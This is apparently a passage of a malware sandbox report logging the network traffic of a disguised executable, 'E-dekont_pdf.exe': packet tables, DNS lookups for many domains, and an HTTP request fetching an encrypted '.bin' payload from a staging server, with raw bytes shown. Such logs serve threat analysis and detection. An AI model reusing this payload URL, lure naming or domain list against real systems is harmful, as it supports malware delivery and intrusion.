                                                                                            Apr 17, 2023 09:03:02.878890991 CEST804987534.117.26.57192.168.11.20
                                                                                            Apr 17, 2023 09:03:03.182503939 CEST804987534.117.26.57192.168.11.20
                                                                                            Apr 17, 2023 09:03:03.182580948 CEST804987534.117.26.57192.168.11.20
                                                                                            Apr 17, 2023 09:03:03.182631969 CEST804987534.117.26.57192.168.11.20
                                                                                            Apr 17, 2023 09:03:03.182852983 CEST4987580192.168.11.2034.117.26.57
                                                                                            Apr 17, 2023 09:03:03.182852983 CEST4987580192.168.11.2034.117.26.57
                                                                                            Apr 17, 2023 09:03:03.195101976 CEST804987534.117.26.57192.168.11.20
                                                                                            Apr 17, 2023 09:03:03.201828957 CEST804987534.117.26.57192.168.11.20
                                                                                            Apr 17, 2023 09:03:03.201900959 CEST804987534.117.26.57192.168.11.20
                                                                                            Apr 17, 2023 09:03:03.201946020 CEST804987534.117.26.57192.168.11.20
                                                                                            Apr 17, 2023 09:03:03.201987982 CEST804987534.117.26.57192.168.11.20
                                                                                            Apr 17, 2023 09:03:03.202023983 CEST4987580192.168.11.2034.117.26.57
                                                                                            Apr 17, 2023 09:03:03.202100039 CEST4987580192.168.11.2034.117.26.57
                                                                                            Apr 17, 2023 09:03:03.202100992 CEST4987580192.168.11.2034.117.26.57
                                                                                            Apr 17, 2023 09:03:03.202164888 CEST4987580192.168.11.2034.117.26.57
                                                                                            Apr 17, 2023 09:03:23.368066072 CEST4987680192.168.11.20198.54.117.211
                                                                                            Apr 17, 2023 09:03:23.545355082 CEST8049876198.54.117.211192.168.11.20
                                                                                            Apr 17, 2023 09:03:23.545613050 CEST4987680192.168.11.20198.54.117.211
                                                                                            Apr 17, 2023 09:03:23.545691967 CEST4987680192.168.11.20198.54.117.211
                                                                                            Apr 17, 2023 09:03:23.723031044 CEST8049876198.54.117.211192.168.11.20
                                                                                            Apr 17, 2023 09:03:23.723105907 CEST8049876198.54.117.211192.168.11.20
                                                                                            Apr 17, 2023 09:03:44.226735115 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:44.339510918 CEST8049877205.178.189.129192.168.11.20
                                                                                            Apr 17, 2023 09:03:44.339793921 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:44.339966059 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:44.713160038 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:44.853806019 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:45.088185072 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:45.837871075 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:47.321913958 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:48.805973053 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:50.290021896 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:53.242547989 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:03:59.131853104 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:04:06.927705050 CEST4988080192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 09:04:06.947671890 CEST8049880185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:04:06.947974920 CEST4988080192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 09:04:06.967942953 CEST8049880185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:04:06.968166113 CEST4988080192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 09:04:06.988174915 CEST8049880185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:04:06.988241911 CEST8049880185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:04:06.988291025 CEST8049880185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:04:06.988637924 CEST4988080192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 09:04:06.988637924 CEST4988080192.168.11.20185.53.179.90
                                                                                            Apr 17, 2023 09:04:07.008660078 CEST8049880185.53.179.90192.168.11.20
                                                                                            Apr 17, 2023 09:04:10.910609007 CEST4987780192.168.11.20205.178.189.129
                                                                                            Apr 17, 2023 09:04:44.282241106 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:44.440319061 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.440598011 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:44.440660954 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:44.597476959 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.858946085 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.859044075 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.859195948 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.859210968 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.859221935 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:44.859306097 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.859428883 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.859433889 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:44.859492064 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.859875917 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:44.859875917 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:44.866544008 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.866664886 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.866764069 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:44.866902113 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:44.898663998 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.898885965 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.015559912 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.015659094 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.015736103 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.015764952 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.015791893 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.015837908 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.015888929 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.015923023 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.015981913 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.016082048 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.016102076 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.016195059 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.016272068 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.016328096 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.016413927 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.016454935 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.016505003 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.016525984 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.016590118 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.016684055 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.016726017 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.016730070 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.016730070 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.016773939 CEST8049882199.33.123.34192.168.11.20
                                                                                            Apr 17, 2023 09:04:45.016927004 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.016927004 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.016927958 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:04:45.017069101 CEST4988280192.168.11.20199.33.123.34
                                                                                            Apr 17, 2023 09:05:05.038543940 CEST4988380192.168.11.2023.227.38.74
                                                                                            Apr 17, 2023 09:05:05.047384024 CEST804988323.227.38.74192.168.11.20
                                                                                            Apr 17, 2023 09:05:05.047621012 CEST4988380192.168.11.2023.227.38.74
                                                                                            Apr 17, 2023 09:05:05.047703028 CEST4988380192.168.11.2023.227.38.74
                                                                                            Apr 17, 2023 09:05:05.056493998 CEST804988323.227.38.74192.168.11.20
                                                                                            Apr 17, 2023 09:05:05.073674917 CEST804988323.227.38.74192.168.11.20
                                                                                            Apr 17, 2023 09:05:05.073756933 CEST804988323.227.38.74192.168.11.20
                                                                                            Apr 17, 2023 09:05:05.073813915 CEST804988323.227.38.74192.168.11.20
                                                                                            Apr 17, 2023 09:05:05.073868036 CEST804988323.227.38.74192.168.11.20
                                                                                            Apr 17, 2023 09:05:05.073919058 CEST804988323.227.38.74192.168.11.20
                                                                                            Apr 17, 2023 09:05:05.073960066 CEST804988323.227.38.74192.168.11.20
                                                                                            Apr 17, 2023 09:05:05.074003935 CEST804988323.227.38.74192.168.11.20
                                                                                            Apr 17, 2023 09:05:05.074430943 CEST4988380192.168.11.2023.227.38.74
                                                                                            Apr 17, 2023 09:05:05.074522018 CEST4988380192.168.11.2023.227.38.74
                                                                                            Apr 17, 2023 09:05:05.074522018 CEST4988380192.168.11.2023.227.38.74

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Apr 17, 2023 08:58:34.425194025 CEST5448553192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 08:58:34.804944992 CEST53544851.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 08:58:55.292944908 CEST5627153192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 08:58:55.329121113 CEST53562711.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 08:59:15.523260117 CEST6525053192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 08:59:15.587918043 CEST53652501.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 08:59:35.800005913 CEST5192553192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 08:59:35.922249079 CEST53519251.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 08:59:56.858057976 CEST5730653192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 08:59:57.565983057 CEST53573061.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:00:38.723364115 CEST5397353192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:00:38.754021883 CEST53539731.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:00:59.031704903 CEST5085253192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:00:59.227818012 CEST53508521.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:01:19.589715004 CEST5076653192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:01:19.895061016 CEST53507661.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:01:40.647274017 CEST5953153192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:01:40.683370113 CEST53595311.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:02:00.877060890 CEST6330953192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:02:00.942027092 CEST53633091.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:02:21.138274908 CEST6154353192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:02:21.283318043 CEST53615431.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:02:41.493166924 CEST5437653192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:02:41.624002934 CEST53543761.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:03:01.848083973 CEST4946153192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:03:02.863156080 CEST4946153192.168.11.209.9.9.9
                                                                                            Apr 17, 2023 09:03:02.863431931 CEST53494611.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:03:03.143291950 CEST53494619.9.9.9192.168.11.20
                                                                                            Apr 17, 2023 09:03:23.327711105 CEST5448253192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:03:23.367352962 CEST53544821.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:03:43.901623011 CEST6089153192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:03:44.226051092 CEST53608911.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:04:25.111327887 CEST6226953192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:04:25.529251099 CEST53622691.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:04:25.529649019 CEST6226953192.168.11.209.9.9.9
                                                                                            Apr 17, 2023 09:04:26.124125957 CEST53622699.9.9.9192.168.11.20
                                                                                            Apr 17, 2023 09:04:44.247371912 CEST5401153192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:04:44.281474113 CEST53540111.1.1.1192.168.11.20
                                                                                            Apr 17, 2023 09:05:05.008330107 CEST6529753192.168.11.201.1.1.1
                                                                                            Apr 17, 2023 09:05:05.037898064 CEST53652971.1.1.1192.168.11.20

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Apr 17, 2023 08:58:34.425194025 CEST192.168.11.201.1.1.10xab45Standard query (0)www.guesstheword.netA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 08:58:55.292944908 CEST192.168.11.201.1.1.10x61fdStandard query (0)www.canadianbreederprogram.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 08:59:15.523260117 CEST192.168.11.201.1.1.10x5f4cStandard query (0)www.furniture-61686.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 08:59:35.800005913 CEST192.168.11.201.1.1.10xc6f4Standard query (0)www.healthinsurancearena.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 08:59:56.858057976 CEST192.168.11.201.1.1.10x2214Standard query (0)www.anjin98.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:00:38.723364115 CEST192.168.11.201.1.1.10xc716Standard query (0)www.elatedfreedom.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:00:59.031704903 CEST192.168.11.201.1.1.10x60c9Standard query (0)www.sneakersuomo.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:01:19.589715004 CEST192.168.11.201.1.1.10xd63Standard query (0)www.jenniferfalconerrealtor.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:01:40.647274017 CEST192.168.11.201.1.1.10x1554Standard query (0)www.hotcoa.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:02:00.877060890 CEST192.168.11.201.1.1.10xb8d7Standard query (0)www.hear-aid-92727.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:02:21.138274908 CEST192.168.11.201.1.1.10x3b0Standard query (0)www.credit-cards-54889.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:02:41.493166924 CEST192.168.11.201.1.1.10x1f9dStandard query (0)www.lapalmaaccesible.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:01.848083973 CEST192.168.11.201.1.1.10x538Standard query (0)www.3ay82.xyzA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:02.863156080 CEST192.168.11.209.9.9.90x538Standard query (0)www.3ay82.xyzA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:23.327711105 CEST192.168.11.201.1.1.10x71eaStandard query (0)www.crosswalkconsulting.co.ukA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:43.901623011 CEST192.168.11.201.1.1.10xb8eeStandard query (0)www.herhustlenation.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:04:25.111327887 CEST192.168.11.201.1.1.10xed9dStandard query (0)www.tmcgroup.africaA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:04:25.529649019 CEST192.168.11.209.9.9.90xed9dStandard query (0)www.tmcgroup.africaA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:04:44.247371912 CEST192.168.11.201.1.1.10xd125Standard query (0)www.hunterboots--canada.comA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:05:05.008330107 CEST192.168.11.201.1.1.10xcf23Standard query (0)www.textare.netA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Apr 17, 2023 08:58:34.804944992 CEST1.1.1.1192.168.11.200xab45No error (0)www.guesstheword.net164.155.209.181A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 08:58:55.329121113 CEST1.1.1.1192.168.11.200x61fdNo error (0)www.canadianbreederprogram.comcanadianbreederprogram.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 17, 2023 08:58:55.329121113 CEST1.1.1.1192.168.11.200x61fdNo error (0)canadianbreederprogram.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 08:58:55.329121113 CEST1.1.1.1192.168.11.200x61fdNo error (0)canadianbreederprogram.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 08:59:15.587918043 CEST1.1.1.1192.168.11.200x5f4cNo error (0)www.furniture-61686.com185.53.179.90A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 08:59:35.922249079 CEST1.1.1.1192.168.11.200xc6f4No error (0)www.healthinsurancearena.comhealthinsurancearena.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 17, 2023 08:59:35.922249079 CEST1.1.1.1192.168.11.200xc6f4No error (0)healthinsurancearena.com66.29.154.110A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 08:59:57.565983057 CEST1.1.1.1192.168.11.200x2214No error (0)www.anjin98.com160.121.87.199A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:00:38.754021883 CEST1.1.1.1192.168.11.200xc716No error (0)www.elatedfreedom.comelatedfreedom.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 17, 2023 09:00:38.754021883 CEST1.1.1.1192.168.11.200xc716No error (0)elatedfreedom.com34.102.136.180A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:00:59.227818012 CEST1.1.1.1192.168.11.200x60c9No error (0)www.sneakersuomo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:00:59.227818012 CEST1.1.1.1192.168.11.200x60c9No error (0)www.sneakersuomo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:01:19.895061016 CEST1.1.1.1192.168.11.200xd63No error (0)www.jenniferfalconerrealtor.comdugout.moxiworks.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 17, 2023 09:01:19.895061016 CEST1.1.1.1192.168.11.200xd63No error (0)dugout.moxiworks.comlb-agent-dugout-pr.moxiworks.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 17, 2023 09:01:19.895061016 CEST1.1.1.1192.168.11.200xd63No error (0)lb-agent-dugout-pr.moxiworks.com64.246.164.134A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:01:40.683370113 CEST1.1.1.1192.168.11.200x1554No error (0)www.hotcoa.com81.171.22.5A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:02:00.942027092 CEST1.1.1.1192.168.11.200xb8d7No error (0)www.hear-aid-92727.com185.53.179.90A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:02:21.283318043 CEST1.1.1.1192.168.11.200x3b0No error (0)www.credit-cards-54889.com185.53.179.91A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:02:41.624002934 CEST1.1.1.1192.168.11.200x1f9dNo error (0)www.lapalmaaccesible.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 17, 2023 09:02:41.624002934 CEST1.1.1.1192.168.11.200x1f9dNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 17, 2023 09:02:41.624002934 CEST1.1.1.1192.168.11.200x1f9dNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:02.863431931 CEST1.1.1.1192.168.11.200x538No error (0)www.3ay82.xyz34.117.26.57A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:02.863431931 CEST1.1.1.1192.168.11.200x538No error (0)www.3ay82.xyz34.117.103.128A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:03.143291950 CEST9.9.9.9192.168.11.200x538No error (0)www.3ay82.xyz34.117.103.128A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:03.143291950 CEST9.9.9.9192.168.11.200x538No error (0)www.3ay82.xyz34.117.26.57A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:23.367352962 CEST1.1.1.1192.168.11.200x71eaNo error (0)www.crosswalkconsulting.co.ukparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:23.367352962 CEST1.1.1.1192.168.11.200x71eaNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:23.367352962 CEST1.1.1.1192.168.11.200x71eaNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:23.367352962 CEST1.1.1.1192.168.11.200x71eaNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:23.367352962 CEST1.1.1.1192.168.11.200x71eaNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:23.367352962 CEST1.1.1.1192.168.11.200x71eaNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:23.367352962 CEST1.1.1.1192.168.11.200x71eaNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:23.367352962 CEST1.1.1.1192.168.11.200x71eaNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:03:44.226051092 CEST1.1.1.1192.168.11.200xb8eeNo error (0)www.herhustlenation.com205.178.189.129A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:04:25.529251099 CEST1.1.1.1192.168.11.200xed9dServer failure (2)www.tmcgroup.africanonenoneA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:04:26.124125957 CEST9.9.9.9192.168.11.200xed9dServer failure (2)www.tmcgroup.africanonenoneA (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:04:44.281474113 CEST1.1.1.1192.168.11.200xd125No error (0)www.hunterboots--canada.com199.33.123.34A (IP address)IN (0x0001)false
                                                                                            Apr 17, 2023 09:05:05.037898064 CEST1.1.1.1192.168.11.200xcf23No error (0)www.textare.netshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 17, 2023 09:05:05.037898064 CEST1.1.1.1192.168.11.200xcf23No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • 34.138.169.8
                                                                                            • www.guesstheword.net
                                                                                            • www.canadianbreederprogram.com
                                                                                            • www.furniture-61686.com
                                                                                            • www.healthinsurancearena.com
                                                                                            • www.anjin98.com
                                                                                            • www.elatedfreedom.com
                                                                                            • www.sneakersuomo.com
                                                                                            • www.jenniferfalconerrealtor.com
                                                                                            • www.hotcoa.com
                                                                                            • www.hear-aid-92727.com
                                                                                            • www.credit-cards-54889.com
                                                                                            • www.lapalmaaccesible.com
                                                                                            • www.3ay82.xyz
                                                                                            • www.crosswalkconsulting.co.uk
                                                                                            • www.herhustlenation.com
                                                                                            • www.hunterboots--canada.com
                                                                                            • www.textare.net

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.11.204985134.138.169.880C:\Users\user\Desktop\E-dekont_pdf.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Apr 17, 2023 08:57:45.684694052 CEST65OUTGET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Host: 34.138.169.8
                                                                                            Cache-Control: no-cache
                                                                                            Apr 17, 2023 08:57:45.847227097 CEST67INHTTP/1.1 200 OK
                                                                                            Date: Mon, 17 Apr 2023 06:57:45 GMT
                                                                                            Server: Apache/2.4.51 (Unix) OpenSSL/1.1.1n
                                                                                            Last-Modified: Tue, 21 Mar 2023 22:37:46 GMT
                                                                                            ETag: "2e640-5f770b150a4e5"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 190016
                                                                                            Content-Type: application/octet-stream
                                                                                            Data Raw: ee c1 3a 56 68 91 54 04 6d 29 61 8f a0 97 9f 6f e2 1d 3c 3e f0 c1 f3 d6 08 75 33 de a3 b4 39 f2 60 3a ec 4c 90 62 3f e2 71 25 67 d1 d4 4a 07 fc 15 ac 43 da e3 00 7b 52 84 5a a4 39 ff a1 5f c8 c1 82 a6 c5 86 6a 11 9b 88 16 a2 d7 bd dc c6 13 ad 20 c0 98 ac 98 ea 0d eb 22 56 59 41 0b db 88 3f 9d 4d cc 8a 8a 33 74 2c e2 bb e0 77 3b ba a5 f0 99 c1 e9 7f 7d c0 7f 1c ca e9 8e de 33 d1 36 42 13 28 49 2c 6e 80 b6 90 a1 9b cc 6a 23 a8 76 35 92 45 ae ab 31 34 b6 60 74 ca 46 58 59 4e a8 d4 8a 37 18 66 34 52 4f a5 35 e5 1f c3 0d b5 64 61 c4 0c f7 37 7d f1 55 b8 2e 8f 60 30 af 6d 09 44 e4 bc 8a 19 99 0f e2 64 ad 4b c0 32 10 0a af 71 20 c4 51 af 91 ad b8 34 a5 a8 e3 4c 4d 8f 3a 79 14 d8 db 81 c4 00 7a 2a 76 33 58 d3 f7 42 32 2f b6 4f 3e 79 c0 74 6c ff f6 f8 75 40 3b 07 69 56 38 13 b6 4a 25 e6 94 ff 61 0a 11 99 fe cd e2 20 1e 89 03 1c 74 fc f0 30 4d f6 4c 23 e4 01 ef 87 fa 7f e3 5b 04 a9 09 16 fc e2 ea 14 c9 7f 82 b8 59 2a 83 40 78 37 9c 7d e8 d6 b2 bd 4a fe db 06 62 b4 4b 44 34 3a 5a fd e0 6a 81 e0 99 ac 37 e6 c9 0a 55 51 cd 2e 7e 8b eb e8 8b 5c 65 0f 72 00 38 7e 32 61 e9 7e 4f 5c ad 3e a1 cf c1 71 b2 d9 33 cc e1 6e c9 9a 3f ee 06 3f 9f ba 23 f3 a3 7d f1 dc 66 52 93 12 06 0a 35 9c f7 60 02 02 cb dd bd 4f 70 e2 01 bd 76 93 2a a7 1f 95 3b 3c f5 94 1b 04 a1 78 c2 05 75 06 4c 37 19 e3 7f c4 12 e9 cf 49 be 7b b5 b0 2a 47 cf 89 54 ab 8f b7 bb 4d 23 e0 22 46 4d 62 28 8b 74 67 f7 07 17 42 cd 69 06 f7 75 eb dd ab af 54 52 5e da 25 eb c9 70 1d 7c 27 a1 83 e6 20 06 88 a4 d1 13 6a 73 92 12 19 d0 c1 3d e4 dd ff b4 d5 24 f6 37 a5 ce 60 8f 3c e0 1a d1 b4 54 96 59 f2 87 ae 7d 48 74 9e e7 5f 26 36 c9 58 a4 f1 07 4e c2 3e b9 86 49 b7 b5 71 2c b5 32 44 1e e4 67 2b f7 a4 09 2c 2b 0f 91 a9 02 42 ef 0a 8c 20 08 fe d1 34 c7 a0 f9 46 dd 3c ea ee d8 78 91 1a f7 69 0c 05 8c 91 4a 22 12 8e 7c aa 91 a6 90 ac 50 33 ea 4f 6b 07 71 c8 34 73 b3 63 fa ff ce 7c 19 db 29 e4 77 96 64 03 d0 b9 6b 03 5d 1a 1d ff 5e 1b 9f b2 54 d1 0e 98 aa f9 65 e7 cd 01 8b 9d 83 8a 11 f3 4b 5f d6 b9 2f b0 c7 a8 b7 ab 5d 37 0c 7f d6 01 ea 4b 21 61 63 18 99 e4 a3 1c c6 9f 32 68 f5 62 a7 e4 8a e4 e4 f8 d0 34 b5 06 aa 1f 06 f6 49 8b 19 4e 24 0b a5 39 51 1c 4b 49 1c 91 a9 87 28 5b d0 bd 82 89 79 8c ce d0 14 31 f2 98 52 1b e0 57 09 bf cc 54 62 3d d2 18 8a 49 d3 bb 59 32 e2 79 a8 c5 bf b8 